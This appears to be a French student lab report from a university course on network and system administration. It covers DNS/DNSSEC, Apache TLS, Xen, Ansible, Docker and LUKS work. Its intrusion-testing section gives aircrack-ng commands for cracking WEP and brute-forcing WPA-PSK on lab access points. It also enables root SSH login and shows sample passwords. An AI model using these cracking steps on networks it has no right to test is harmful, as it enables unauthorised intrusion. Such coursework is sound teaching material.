En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
Ansible est un logiciel Open Source qui permet de gérer finement une infrastructure informatique, les déploiements automatisés multi-environnements, les ordinateurs et les configurations systèmes[https://www.syloe.com/glossaire/ansible plus]. Nous allons nous servir de cet outil afin d'automatiser le déploiement de notre site web sur la ferme de serveurs.&lt;br /&gt;
&lt;br /&gt;
====Diffusion de la clé SSH====&lt;br /&gt;
Pour travailler le plus efficacement avec ansible il faut que l'on puissent se connecter en SSH aux machines cibles sans avoir à taper le mot de passe à chaque fois. Pour ce faire, nous devons  ajouter manuellement notre clé publique à la liste des hôtes autorisés sur chaque machine.&lt;br /&gt;
 &lt;br /&gt;
Etape à suivre sur notre machine virtuelle publique:&lt;br /&gt;
* On installe ansible avec un apt-get.&lt;br /&gt;
* On génère une clef asymétrique:&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
* On diffuse la clef publique sur les machines virtuelles privées 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
====Hosts====&lt;br /&gt;
Sur la VM publique et afin de rendre notre inventaire plus explicite, nous ajoutons la configuration des noms d'hôtes à notre /etc/network/hosts:&lt;br /&gt;
 root@mycoplasma:~# cat /etc/hosts&lt;br /&gt;
 127.0.0.1    localhost&lt;br /&gt;
 127.0.1.1    mycoplasma mycoplasma&lt;br /&gt;
 192.168.0.1	private-6phil&lt;br /&gt;
 192.168.0.2	private-mycoplasma	&lt;br /&gt;
 192.168.0.3	private-herpesgenital&lt;br /&gt;
 192.168.0.4	private-chlamydiae &lt;br /&gt;
 192.168.0.5	private-chaudepisse&lt;br /&gt;
 192.168.0.6	private-blennoragie&lt;br /&gt;
 ...&lt;br /&gt;
&lt;br /&gt;
Toujours sur la VM publique on rédige l'inventaire de notre parc en modifiant ( /etc/ansible/hosts ) c'est un fichier à remplir en utilisant la syntaxe YAML:&lt;br /&gt;
&lt;br /&gt;
root@mycoplasma:~# cat /etc/ansible/hosts       &lt;br /&gt;
 all:&lt;br /&gt;
  hosts:&lt;br /&gt;
   mycoplasma:&lt;br /&gt;
  children:&lt;br /&gt;
   webservers:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-6phil:&lt;br /&gt;
     private-mycoplasma:&lt;br /&gt;
     private-herpesgenital:&lt;br /&gt;
     private-chlamydiae:&lt;br /&gt;
     private-chaudepisse:&lt;br /&gt;
     private-blennoragie:&lt;br /&gt;
   ntp-client:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-mycoplasma&lt;br /&gt;
   ntp-server:&lt;br /&gt;
    hosts:&lt;br /&gt;
     mycoplasma&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut tester notre parc:&lt;br /&gt;
 root@mycoplasma:~# ansible all -m ping -o&lt;br /&gt;
 private-6phil         | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-mycoplasma    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-herpesgenital | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chlamydiae    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 mycoplasma            | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chaudepisse   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-blennoragie   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter sans mot de passe, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est un moyen d’exécuter une liste des tâches sur des machines à l'aide d'ansible.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
Cette partie n'est pas à réaliser.&lt;br /&gt;
&lt;br /&gt;
===Cryptage de données===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette partie est d'apprendre à sécuriser des données sur une clé en cryptant les informations. Pour ce faire, il faut commencer par installer les outils nécessaires : &lt;br /&gt;
 root@zabethX :~$  apt-get update&lt;br /&gt;
 root@zabethX :~$  apt-get install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
Cryptsetup est une interface en ligne de commande permettant de gérer les fonctionnalités et les actions de dm-crypt. Nous avons trouvé beaucoup de documentations sur internet, nous vous conseillons ce [https://doc.ubuntu-fr.org/cryptsetup site].&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il faut (brancher la clé USB et) chercher le périphérique et ses partitions avec la commande suivante :&lt;br /&gt;
 root@zabethX:~#  fdisk -l // Permet de lister les partitions de la machine &lt;br /&gt;
&lt;br /&gt;
 root@zabethX:~# lsblk&lt;br /&gt;
&lt;br /&gt;
 NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 sda            254:0    0   124G  0 disk &lt;br /&gt;
   └─sda1 254:1    0   124G  0 part /&lt;br /&gt;
 sdb            254:16   0   8G  0 disk &lt;br /&gt;
   ├─sdb1 254:17   0  8G  0 part /&lt;br /&gt;
&lt;br /&gt;
Notre clé USB est sdb, on peut la crypter : &lt;br /&gt;
    root@zabethX:~# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb1&lt;br /&gt;
On crée un répertoire de point de montage, par convention c'est /mnt mais on peut créer un autre dossier dans ce dernier: &lt;br /&gt;
    root@zabethX:~#  mkdir /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
On chiffre la clé USB, on doit entrer le mot de passe qui permettra de sécuriser la clé. &lt;br /&gt;
     root@zabethX:~#  cryptsetup luksOpen /dev/sdb1 usbkey&lt;br /&gt;
     root@zabethX:~# mkfs.ext4 /dev/mapper/usbkey&lt;br /&gt;
Il faut faire l'association entre la partition du périphérique et le point de montage.&lt;br /&gt;
     root@zabethX:~#  mount -t ext4 /dev/mapper/usbkey /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Il faut créer un fichier basique avec la commande vim par exemple, on peut écrire un mot et démonter la clé: &lt;br /&gt;
     root@zabethX:~#  umount /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Lorsqu'on échange nos clés entre deux binômes, on remarque que le processus a bien fonctionné et que lorsqu'on essaye d'accéder à la clé cette dernière est protégé par un mot de passe.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;br /&gt;
Le but est de faire en sorte que l’accès à la borne WiFi soit controlé par WPA2-EAP. L’identification va se faire en utilisant le même serveur FreeRadius que pour la sécurisation filaire.&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la configuration Wifi  :&lt;br /&gt;
 root@zabethX:~# minicom -os // Sur l'ordinateur avec la clé Wifi&lt;br /&gt;
&lt;br /&gt;
Il faut changer quelques propriétés : &lt;br /&gt;
* concernant le port : /dev/ttyUSB0, &lt;br /&gt;
* 9600 bauds&lt;br /&gt;
* Désactiver le control de flux&lt;br /&gt;
&lt;br /&gt;
Pour passer en super utilisateur : &lt;br /&gt;
 ap&amp;gt; enable &lt;br /&gt;
Il faut entrer le mot de passe :&amp;quot;Cisco&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Concernant la configuration: &lt;br /&gt;
 ap#&amp;gt; config term&lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_mycoplasma2 group radius_mycoplasma2&lt;br /&gt;
 ap(config)#&amp;gt; aaa new-model //authentication, authorization, accounting&lt;br /&gt;
 ap(config)#&amp;gt; radius-server host 193.48.57.178 auth-port 1812 acct-port 1813 key mycoplasma2&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; aaa group server radius radius_mycoplasma2&lt;br /&gt;
   ap(config-sg-radius)# server 193.48.57.178 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_group2 group radius_mycoplasma2&lt;br /&gt;
&lt;br /&gt;
* Création des SSID, protégé par la méthode WPA2-EAP :&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; dot11 ssid SSID_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# vlan 102&lt;br /&gt;
    ap(config-ssid)# authentication open eap eap_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# authentication network-eap eap_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# authentication key-management wpa&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52083</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52083"/>
